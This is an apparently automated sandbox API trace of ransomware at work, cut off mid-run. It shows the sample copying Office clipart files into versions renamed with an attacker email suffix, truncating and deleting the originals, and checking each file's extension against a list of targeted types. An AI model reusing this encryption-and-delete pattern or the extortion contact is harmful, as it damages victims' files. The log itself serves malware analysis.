	[0143.779] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CRANINST.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\craninst.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3cc
	[0143.908] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0xa68ff1c | out: lpFileSize=0xa68ff1c*=49546) returned 1
	[0143.908] CloseHandle (hObject=0x3cc) returned 1
	[0143.908] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CRANINST.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\craninst.wmf")) returned 0x20
	[0143.912] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CRANINST.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\craninst.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0143.912] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CRANINST.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\craninst.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3cc
	[0143.912] SetFilePointerEx (in: hFile=0x3cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0143.913] SetFilePointerEx (in: hFile=0x3cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0143.913] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CRANINST.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\craninst.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0143.913] GetLastError () returned 0x0
	[0143.913] ReadFile (in: hFile=0x3cc, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0xc18a, lpOverlapped=0x0) returned 1
	[0143.915] WriteFile (in: hFile=0x388, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xc190, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xc190, lpOverlapped=0x0) returned 1
	[0143.917] ReadFile (in: hFile=0x3cc, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x0, lpOverlapped=0x0) returned 1
	[0143.917] WriteFile (in: hFile=0x388, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0143.917] SetEndOfFile (hFile=0x388) returned 1
	[0143.917] CloseHandle (hObject=0x388) returned 1
	[0143.917] SetFilePointerEx (in: hFile=0x3cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0143.917] SetEndOfFile (hFile=0x3cc) returned 1
	[0143.920] CloseHandle (hObject=0x3cc) returned 1
	[0143.920] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CRANINST.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0143.921] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CRANINST.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\craninst.wmf")) returned 1
	[0143.921] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CRANINST.WMF") returned 63
	[0143.921] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CRANINST.WMF") returned 63
	[0143.921] lstrlenW (lpString=".doc") returned 4
	[0143.921] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0143.921] lstrlenW (lpString=".docx") returned 5
	[0143.921] lstrcmpiW (lpString1=".docx", lpString2="T.WMF") returned -1
	[0143.921] lstrlenW (lpString=".pdf") returned 4
	[0143.921] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0143.921] lstrlenW (lpString=".xls") returned 4
	[0143.921] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0143.921] lstrlenW (lpString=".xlsx") returned 5
	[0143.921] lstrcmpiW (lpString1=".xlsx", lpString2="T.WMF") returned -1
	[0143.921] lstrlenW (lpString=".ppt") returned 4
	[0143.921] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0143.922] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CRANINST.WMF") returned 63
	[0143.922] lstrlenW (lpString=".zip") returned 4
	[0143.922] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0143.922] lstrlenW (lpString=".rar") returned 4
	[0143.922] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0143.922] lstrlenW (lpString=".bz2") returned 4
	[0143.922] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0143.922] lstrlenW (lpString=".7z") returned 3
	[0143.922] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0143.922] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CRANINST.WMF") returned 63
	[0143.922] lstrlenW (lpString=".dbf") returned 4
	[0143.922] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0143.922] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CRANINST.WMF") returned 63
	[0143.922] lstrlenW (lpString=".1cd") returned 4
	[0143.922] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0143.922] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CRANINST.WMF") returned 63
	[0143.922] lstrlenW (lpString=".jpg") returned 4
	[0143.922] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0143.922] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CRANINST.WMF") returned 63
	[0143.922] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CRANINST.WMF") returned 63
	[0143.922] lstrlenW (lpString=".doc") returned 4
	[0143.922] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0143.922] lstrlenW (lpString=".docx") returned 5
	[0143.922] lstrcmpiW (lpString1=".docx", lpString2="T.WMF") returned -1
	[0143.922] lstrlenW (lpString=".pdf") returned 4
	[0143.922] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0143.922] lstrlenW (lpString=".xls") returned 4
	[0143.922] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0143.922] lstrlenW (lpString=".xlsx") returned 5
	[0143.922] lstrcmpiW (lpString1=".xlsx", lpString2="T.WMF") returned -1
	[0143.922] lstrlenW (lpString=".ppt") returned 4
	[0143.922] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0143.923] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CRANINST.WMF") returned 63
	[0143.923] lstrlenW (lpString=".zip") returned 4
	[0143.923] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0143.923] lstrlenW (lpString=".rar") returned 4
	[0143.923] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0143.923] lstrlenW (lpString=".bz2") returned 4
	[0143.923] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0143.923] lstrlenW (lpString=".7z") returned 3
	[0143.923] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0143.923] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CRANINST.WMF") returned 63
	[0143.923] lstrlenW (lpString=".dbf") returned 4
	[0143.923] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0143.923] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CRANINST.WMF") returned 63
	[0143.923] lstrlenW (lpString=".1cd") returned 4
	[0143.923] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0143.923] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CRANINST.WMF") returned 63
	[0143.923] lstrlenW (lpString=".jpg") returned 4
	[0143.923] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0143.923] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0143.923] lstrlenW (lpString="DD00255_.WMF") returned 12
	[0143.923] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00255_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00255_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3cc
	[0143.924] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0xa68ff1c | out: lpFileSize=0xa68ff1c*=2690) returned 1
	[0143.924] CloseHandle (hObject=0x3cc) returned 1
	[0143.925] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00255_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00255_.wmf")) returned 0x20
	[0143.925] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00255_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00255_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0143.925] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00255_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00255_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3cc
	[0143.925] SetFilePointerEx (in: hFile=0x3cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0143.925] SetFilePointerEx (in: hFile=0x3cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0143.925] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00255_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00255_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0143.926] GetLastError () returned 0x0
	[0143.926] ReadFile (in: hFile=0x3cc, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0xa82, lpOverlapped=0x0) returned 1
	[0143.927] WriteFile (in: hFile=0x388, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xa90, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xa90, lpOverlapped=0x0) returned 1
	[0143.928] ReadFile (in: hFile=0x3cc, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x0, lpOverlapped=0x0) returned 1
	[0143.928] WriteFile (in: hFile=0x388, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0143.928] SetEndOfFile (hFile=0x388) returned 1
	[0143.928] CloseHandle (hObject=0x388) returned 1
	[0143.929] SetFilePointerEx (in: hFile=0x3cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0143.929] SetEndOfFile (hFile=0x3cc) returned 1
	[0143.931] CloseHandle (hObject=0x3cc) returned 1
	[0143.931] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00255_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0143.931] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00255_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00255_.wmf")) returned 1
	[0143.932] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00255_.WMF") returned 63
	[0143.932] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00255_.WMF") returned 63
	[0143.932] lstrlenW (lpString=".doc") returned 4
	[0143.932] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0143.932] lstrlenW (lpString=".docx") returned 5
	[0143.932] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0143.932] lstrlenW (lpString=".pdf") returned 4
	[0143.932] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0143.932] lstrlenW (lpString=".xls") returned 4
	[0143.932] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0143.932] lstrlenW (lpString=".xlsx") returned 5
	[0143.932] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0143.932] lstrlenW (lpString=".ppt") returned 4
	[0143.932] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0143.932] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00255_.WMF") returned 63
	[0143.932] lstrlenW (lpString=".zip") returned 4
	[0143.932] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0143.932] lstrlenW (lpString=".rar") returned 4
	[0143.932] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0143.932] lstrlenW (lpString=".bz2") returned 4
	[0143.932] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0143.932] lstrlenW (lpString=".7z") returned 3
	[0143.932] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0143.932] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00255_.WMF") returned 63
	[0143.932] lstrlenW (lpString=".dbf") returned 4
	[0143.932] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0143.932] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00255_.WMF") returned 63
	[0143.932] lstrlenW (lpString=".1cd") returned 4
	[0143.932] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0143.932] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00255_.WMF") returned 63
	[0143.932] lstrlenW (lpString=".jpg") returned 4
	[0143.932] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0143.932] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00255_.WMF") returned 63
	[0143.933] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00255_.WMF") returned 63
	[0143.933] lstrlenW (lpString=".doc") returned 4
	[0143.933] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0143.933] lstrlenW (lpString=".docx") returned 5
	[0143.933] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0143.933] lstrlenW (lpString=".pdf") returned 4
	[0143.933] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0143.933] lstrlenW (lpString=".xls") returned 4
	[0143.933] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0143.933] lstrlenW (lpString=".xlsx") returned 5
	[0143.933] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0143.933] lstrlenW (lpString=".ppt") returned 4
	[0143.933] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0143.933] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00255_.WMF") returned 63
	[0143.933] lstrlenW (lpString=".zip") returned 4
	[0143.933] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0143.933] lstrlenW (lpString=".rar") returned 4
	[0143.933] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0143.933] lstrlenW (lpString=".bz2") returned 4
	[0143.933] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0143.933] lstrlenW (lpString=".7z") returned 3
	[0143.933] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0143.933] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00255_.WMF") returned 63
	[0143.934] lstrlenW (lpString=".dbf") returned 4
	[0143.934] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0143.934] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00255_.WMF") returned 63
	[0143.934] lstrlenW (lpString=".1cd") returned 4
	[0143.934] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0143.934] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00255_.WMF") returned 63
	[0143.934] lstrlenW (lpString=".jpg") returned 4
	[0143.934] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0143.934] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0143.934] lstrlenW (lpString="DD00256_.WMF") returned 12
	[0143.934] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00256_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00256_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3cc
	[0143.934] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0xa68ff1c | out: lpFileSize=0xa68ff1c*=2832) returned 1
	[0143.934] CloseHandle (hObject=0x3cc) returned 1
	[0143.934] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00256_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00256_.wmf")) returned 0x20
	[0143.935] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00256_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00256_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0143.935] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00256_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00256_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3cc
	[0143.935] SetFilePointerEx (in: hFile=0x3cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0143.935] SetFilePointerEx (in: hFile=0x3cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0143.935] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00256_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00256_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0143.935] GetLastError () returned 0x0
	[0143.935] ReadFile (in: hFile=0x3cc, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0xb10, lpOverlapped=0x0) returned 1
	[0143.937] WriteFile (in: hFile=0x388, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xb20, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xb20, lpOverlapped=0x0) returned 1
	[0143.938] ReadFile (in: hFile=0x3cc, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x0, lpOverlapped=0x0) returned 1
	[0143.938] WriteFile (in: hFile=0x388, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0143.938] SetEndOfFile (hFile=0x388) returned 1
	[0143.938] CloseHandle (hObject=0x388) returned 1
	[0143.938] SetFilePointerEx (in: hFile=0x3cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0143.938] SetEndOfFile (hFile=0x3cc) returned 1
	[0143.940] CloseHandle (hObject=0x3cc) returned 1
	[0143.940] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00256_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0143.941] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00256_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00256_.wmf")) returned 1
	[0143.941] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00256_.WMF") returned 63
	[0143.941] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00256_.WMF") returned 63
	[0143.941] lstrlenW (lpString=".doc") returned 4
	[0143.941] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0143.941] lstrlenW (lpString=".docx") returned 5
	[0143.941] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0143.941] lstrlenW (lpString=".pdf") returned 4
	[0143.941] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0143.941] lstrlenW (lpString=".xls") returned 4
	[0143.941] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0143.941] lstrlenW (lpString=".xlsx") returned 5
	[0143.941] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0143.941] lstrlenW (lpString=".ppt") returned 4
	[0143.941] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0143.941] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00256_.WMF") returned 63
	[0143.942] lstrlenW (lpString=".zip") returned 4
	[0143.942] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0143.942] lstrlenW (lpString=".rar") returned 4
	[0143.942] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0143.942] lstrlenW (lpString=".bz2") returned 4
	[0143.942] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0143.942] lstrlenW (lpString=".7z") returned 3
	[0143.942] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0143.942] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00256_.WMF") returned 63
	[0143.942] lstrlenW (lpString=".dbf") returned 4
	[0143.942] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0143.942] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00256_.WMF") returned 63
	[0143.942] lstrlenW (lpString=".1cd") returned 4
	[0143.942] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0143.942] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00256_.WMF") returned 63
	[0143.942] lstrlenW (lpString=".jpg") returned 4
	[0143.942] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0143.942] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00256_.WMF") returned 63
	[0143.942] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00256_.WMF") returned 63
	[0143.942] lstrlenW (lpString=".doc") returned 4
	[0143.942] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0143.942] lstrlenW (lpString=".docx") returned 5
	[0143.942] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0143.942] lstrlenW (lpString=".pdf") returned 4
	[0143.942] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0143.942] lstrlenW (lpString=".xls") returned 4
	[0143.942] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0143.942] lstrlenW (lpString=".xlsx") returned 5
	[0143.942] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0143.942] lstrlenW (lpString=".ppt") returned 4
	[0143.942] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0143.942] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00256_.WMF") returned 63
	[0143.942] lstrlenW (lpString=".zip") returned 4
	[0143.942] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0143.943] lstrlenW (lpString=".rar") returned 4
	[0143.943] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0143.943] lstrlenW (lpString=".bz2") returned 4
	[0143.943] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0143.943] lstrlenW (lpString=".7z") returned 3
	[0143.943] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0143.943] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00256_.WMF") returned 63
	[0143.943] lstrlenW (lpString=".dbf") returned 4
	[0143.943] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0143.943] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00256_.WMF") returned 63
	[0143.943] lstrlenW (lpString=".1cd") returned 4
	[0143.943] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0143.943] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00256_.WMF") returned 63
	[0143.943] lstrlenW (lpString=".jpg") returned 4
	[0143.943] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0143.943] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0143.943] lstrlenW (lpString="DD00261_.WMF") returned 12
	[0143.943] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00261_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00261_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3cc
